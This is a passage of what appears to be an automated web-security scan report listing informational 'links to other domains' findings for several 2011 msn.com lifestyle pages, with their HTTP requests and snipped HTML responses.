http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/news/search?q=airport+weather+delays&form=msnhpm
http://www.bing.com/search?q=Best+home+remedies&go=&form=msnhal
http://www.bing.com/search?q=Ines+Sainz+at+super+bowl+media+day&FORM=msnhpm
http://www.bing.com/search?q=castor+oil+and+home+remedies&go=&form=msnhal
http://www.bing.com/search?q=cuckoo%27s+nest+hospital+and+remains&form=msnhpm
http://www.bing.com/search?q=herbal+remedies&go=&form=msnhal
http://www.bing.com/search?q=natural+remedies&go=&form=msnhal
http://www.bing.com/search?q=punxsutawney+phil+125th+anniversary&form=msnhpm
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bltwy.com/
http://www.delish.com/
http://www.myhomemsn.com/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296661291&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fspecials.msn.com%2FA-List%2FLifestyle%2FBest-home-remedies.aspx%3Fcp-documentid%3D27020257%26imageindex%3D1&lc=1033&id=74314
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

GET /A-List/Lifestyle/Best-home-remedies.aspx?cp-documentid=27020257&imageindex=1 HTTP/1.1
Host: specials.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:41:31 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA53
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=47e66210ec3e482396c69f353c219c9b; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=8F6B92E99ABE4FCF8AE22F0D6E82098B; domain=.msn.com; expires=Sun, 21-Aug-2011 15:41:31 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 32392

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<div><img src="http://msnportalspecials.112.2O7.net/b/ss/msnportalspecials/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296661291&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fspecials.msn.com%2FA-List%2FLifestyle%2FBest-home-remedies.aspx%3Fcp-documentid%3D27020257%26imageindex%3D1&lc=1033&id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
</strong><a id="hplink" href="http://www.myhomemsn.com/">Make msn.com your home page</a>
...[SNIP]...
<div><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Best+home+remedies&go=&form=msnhal"><strong>
...[SNIP]...
<div>Maybe Grandma was on to something with that <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=castor+oil+and+home+remedies&go=&form=msnhal">castor oil</a>
...[SNIP]...
<div>Once dismissed by medical experts as superstition and folklore, <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=herbal+remedies&go=&form=msnhal">herbal</a> and <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=natural+remedies&go=&form=msnhal">natural</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=cuckoo%27s+nest+hospital+and+remains&form=msnhpm">'Cuckoo's Nest' & remains</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=punxsutawney+phil+125th+anniversary&form=msnhpm">Punxsutawney Phil</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=Ines+Sainz+at+super+bowl+media+day&FORM=msnhpm">Ines Sainz...s outfit</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/news/search?q=airport+weather+delays&form=msnhpm">Airport weather delays</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn/">Advertise on MSN</a>
...[SNIP]...

17.188. http://specials.msn.com/A-List/Lifestyle/January-2011-quotes-of-the-month.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.msn.com
Path:	/A-List/Lifestyle/January-2011-quotes-of-the-month.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://specials.msn.com/A-List/Lifestyle/January-2011-quotes-of-the-month.aspx?cp-documentid=27455586&imageindex=1

The response contains the following links to other domains:

http://advertising.microsoft.com/msn/
http://download.live.com/?sku=messenger
http://insidemsn.wordpress.com/
http://mail.live.com/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportalspecials.112.2o7.net/b/ss/msnportalspecials/1/H.1--NS/0
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/news/search?q=airport+weather+delays&form=msnhpm
http://www.bing.com/search?q=%27blood+libel%27+sarah+palin&form=msnhal
http://www.bing.com/search?q=Australia+floods%2C+fish+death+in+Arkansas+and+acts+of+nature+January+2011+freakish+acts+of+nature&go=&form=msnhal
http://www.bing.com/search?q=Gabrielle+Giffords+shooting&form=msnhal
http://www.bing.com/search?q=Ines+Sainz+at+super+bowl+media+day&FORM=msnhpm
http://www.bing.com/search?q=cuckoo%27s+nest+hospital+and+remains&form=msnhpm
http://www.bing.com/search?q=house+vote+repeal+health+care&go=&form=msnhal
http://www.bing.com/search?q=kim+kardashian+botox+before+and+after&form=msnhal
http://www.bing.com/search?q=punxsutawney+phil+125th+anniversary&form=msnhpm
http://www.bing.com/search?q=reaction+to+Tucson+shootings&go=&form=msnhal
http://www.bing.com/search?q=sarah+palin+%27target%27+list+gabrielle+giffords&form=msnhal
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bltwy.com/
http://www.delish.com/
http://www.myhomemsn.com/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296661290&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fspecials.msn.com%2FA-List%2FLifestyle%2FJanuary-2011-quotes-of-the-month.aspx%3Fcp-documentid%3D27455586%26imageindex%3D1&lc=1033&id=74314
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

GET /A-List/Lifestyle/January-2011-quotes-of-the-month.aspx?cp-documentid=27455586&imageindex=1 HTTP/1.1
Host: specials.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:41:30 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA52
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=d2eca580e76044d8be4e3ae414515ce4; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=997CB5A4C2B14917BF306021EF0D84B5; domain=.msn.com; expires=Sun, 21-Aug-2011 15:41:30 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 43439

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<div><img src="http://msnportalspecials.112.2O7.net/b/ss/msnportalspecials/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296661290&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fspecials.msn.com%2FA-List%2FLifestyle%2FJanuary-2011-quotes-of-the-month.aspx%3Fcp-documentid%3D27455586%26imageindex%3D1&lc=1033&id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
</strong><a id="hplink" href="http://www.myhomemsn.com/">Make msn.com your home page</a>
...[SNIP]...
<div><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Gabrielle+Giffords+shooting&form=msnhal"><strong>
...[SNIP]...
<div>The deadly shootings in Arizona that injured U.S. Rep. Gabrielle Giffords -- and <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=reaction+to+Tucson+shootings&go=&form=msnhal">reactions</a>
...[SNIP]...
<div>Sarah Palin took heat for the <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=%27blood+libel%27+sarah+palin&form=msnhal">harsh words</a> she unleashed on critics who attacked the <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=sarah+palin+%27target%27+list+gabrielle+giffords&form=msnhal">rhetoric and imagery</a>
...[SNIP]...
<li>The vote to <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=house+vote+repeal+health+care&go=&form=msnhal">repeal health care</a>
...[SNIP]...
<li><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=kim+kardashian+botox+before+and+after&form=msnhal">Certain celebrities</a>
...[SNIP]...
<li>As did the mysterious Arkansas fish plague, one of many odd examples of <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Australia+floods%2C+fish+death+in+Arkansas+and+acts+of+nature+January+2011+freakish+acts+of+nature&go=&form=msnhal">freakish acts of nature</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=cuckoo%27s+nest+hospital+and+remains&form=msnhpm">'Cuckoo's Nest' & remains</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=punxsutawney+phil+125th+anniversary&form=msnhpm">Punxsutawney Phil</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=Ines+Sainz+at+super+bowl+media+day&FORM=msnhpm">Ines Sainz...s outfit</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/news/search?q=airport+weather+delays&form=msnhpm">Airport weather delays</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn/">Advertise on MSN</a>
...[SNIP]...

17.189. http://specials.msn.com/A-List/Lifestyle/Man-jailed-for-defecating-in-store.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.msn.com
Path:	/A-List/Lifestyle/Man-jailed-for-defecating-in-store.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://specials.msn.com/A-List/Lifestyle/Man-jailed-for-defecating-in-store.aspx?cp-documentid=27493016

The response contains the following links to other domains:

http://advertising.microsoft.com/msn/
http://download.live.com/?sku=messenger
http://insidemsn.wordpress.com/
http://mail.live.com/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportalspecials.112.2o7.net/b/ss/msnportalspecials/1/H.1--NS/0
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/maps/default.aspx?q=Finsp%c3%a5ng&mkt=en-US&FORM=msnpop
http://www.bing.com/news/search?q=Mel+Gibson+and+final+cut&form=msnpop
http://www.bing.com/news/search?q=airport+weather+delays&form=msnhpm
http://www.bing.com/search?q=Finspang+and+health+regulations+prohibited&form=msnpop
http://www.bing.com/search?q=Ines+Sainz+at+super+bowl+media+day&FORM=msnhpm
http://www.bing.com/search?q=Man+jailed+for+store+floor+pooping&form=msnpop
http://www.bing.com/search?q=Swedish+man+and+chocolate+bar+and+eight+months+in+prison&go=&form=msnpop
http://www.bing.com/search?q=cuckoo%27s+nest+hospital+and+remains&form=msnhpm
http://www.bing.com/search?q=man+and+soul+collector&form=msnpop
http://www.bing.com/search?q=punxsutawney+phil+125th+anniversary&form=msnhpm
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bltwy.com/
http://www.delish.com/
http://www.myhomemsn.com/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296661288&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fspecials.msn.com%2FA-List%2FLifestyle%2FMan-jailed-for-defecating-in-store.aspx%3Fcp-documentid%3D27493016&lc=1033&id=74314
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

GET /A-List/Lifestyle/Man-jailed-for-defecating-in-store.aspx?cp-documentid=27493016 HTTP/1.1
Host: specials.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:41:28 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA54
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=4282ff3cb6a1452cb5ff647758795e67; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=137557FF1237400E982468DF15B5175C; domain=.msn.com; expires=Sun, 21-Aug-2011 15:41:28 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 23311

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<div><img src="http://msnportalspecials.112.2O7.net/b/ss/msnportalspecials/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296661288&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fspecials.msn.com%2FA-List%2FLifestyle%2FMan-jailed-for-defecating-in-store.aspx%3Fcp-documentid%3D27493016&lc=1033&id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
</strong><a id="hplink" href="http://www.myhomemsn.com/">Make msn.com your home page</a>
...[SNIP]...
<div><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Man+jailed+for+store+floor+pooping&form=msnpop"><strong>
...[SNIP]...
<div>A man in a Swedish village (<a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/maps/default.aspx?q=Finsp%c3%a5ng&mkt=en-US&FORM=msnpop">see where</a>) was denied use of the toilet facilities. (<a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Finspang+and+health+regulations+prohibited&form=msnpop">Here...s why</a>.) He took revenge, and he was arrested. (Here...s <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Swedish+man+and+chocolate+bar+and+eight+months+in+prison&go=&form=msnpop">his sentence</a>
...[SNIP]...
<div>A former mayoral candidate in Fergus Falls, Minn., says his neighbor tried to ...collect his soul.... Here...s what he <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=man+and+soul+collector&form=msnpop">allegedly did</a>
...[SNIP]...
<div>And then there...s the final cut of Mel Gibson...s ...The Beaver.... Did someone <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/news/search?q=Mel+Gibson+and+final+cut&form=msnpop">steal it</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=cuckoo%27s+nest+hospital+and+remains&form=msnhpm">'Cuckoo's Nest' & remains</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=punxsutawney+phil+125th+anniversary&form=msnhpm">Punxsutawney Phil</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=Ines+Sainz+at+super+bowl+media+day&FORM=msnhpm">Ines Sainz...s outfit</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/news/search?q=airport+weather+delays&form=msnhpm">Airport weather delays</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn/">Advertise on MSN</a>
...[SNIP]...

17.190. http://specials.msn.com/A-List/Lifestyle/Monk-charged-under-anti-smoking-law.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.msn.com
Path:	/A-List/Lifestyle/Monk-charged-under-anti-smoking-law.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://specials.msn.com/A-List/Lifestyle/Monk-charged-under-anti-smoking-law.aspx?cp-documentid=27490985

The response contains the following links to other domains:

http://advertising.microsoft.com/msn/
http://download.live.com/?sku=messenger
http://insidemsn.wordpress.com/
http://mail.live.com/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportalspecials.112.2o7.net/b/ss/msnportalspecials/1/H.1--NS/0
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/maps/default.aspx?q=Bhutan&mkt=en-US&FORM=msnpop
http://www.bing.com/news/search?q=airport+weather+delays&form=msnhpm
http://www.bing.com/search?q=Ines+Sainz+at+super+bowl+media+day&FORM=msnhpm
http://www.bing.com/search?q=cuckoo%27s+nest+hospital+and+remains&form=msnhpm
http://www.bing.com/search?q=monk+smoking+law&go=&form=msnpop
http://www.bing.com/search?q=monk+smoking+law+and+bad+karma&form=msnpop
http://www.bing.com/search?q=monk+smoking+law+and+five+years+in+prison&form=msnpop
http://www.bing.com/search?q=punxsutawney+phil+125th+anniversary&form=msnhpm
http://www.bing.com/search?q=smoking+and+brain+defect&form=msnpop
http://www.bing.com/search?q=smoking+and+quit+and+tips&form=msnpop
http://www.bing.com/search?q=tobacco+and+Strasburg&form=msnpop
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bltwy.com/
http://www.delish.com/
http://www.myhomemsn.com/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296661291&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fspecials.msn.com%2FA-List%2FLifestyle%2FMonk-charged-under-anti-smoking-law.aspx%3Fcp-documentid%3D27490985&lc=1033&id=74314
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

GET /A-List/Lifestyle/Monk-charged-under-anti-smoking-law.aspx?cp-documentid=27490985 HTTP/1.1
Host: specials.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:41:31 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA49
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=36a1e1e9c47f460bae51aeb1931c23cf; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=C602C893B2514ED3B89DCAE460810713; domain=.msn.com; expires=Sun, 21-Aug-2011 15:41:31 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 23152

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<div><img src="http://msnportalspecials.112.2O7.net/b/ss/msnportalspecials/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
